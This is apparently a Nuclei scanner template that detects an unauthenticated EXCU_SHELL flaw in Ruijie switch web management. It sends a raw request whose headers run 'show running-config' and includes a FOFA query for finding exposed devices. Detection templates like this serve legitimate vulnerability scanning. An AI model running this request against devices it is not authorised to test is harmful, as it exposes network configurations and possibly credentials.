id: ruijie-excu-shell

info:
  name: Ruijie Switch Web Management System EXCU_SHELL - Information Disclosure
  author: xc
  severity: high
  description: |
    Ruijie switch WEB management system is vulnerable to an EXCU_SHELL information disclosure issue, potentially exposing sensitive system information to unauthorized parties.
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
  tags: ruijie,switch,disclosure,misconfig

http:
  - raw:
      - |
        GET /EXCU_SHELL HTTP/1.1
        Host: {{Hostname}}
        Cmdnum: '1'
        Command1: show running-config
        Confirm1: n

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Building configuration"
          - "Current configuration"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a004830460221008c7460ee48c5f44e15f8f37f690a3f38a8859a8e96102b55fb81b6128bf294fc02210086a0875e5d9a74a4b40853ca21687ef9a03e4a4c919b952796ab64d4929429f0:922c64590222798bb761d5b6d8e72950
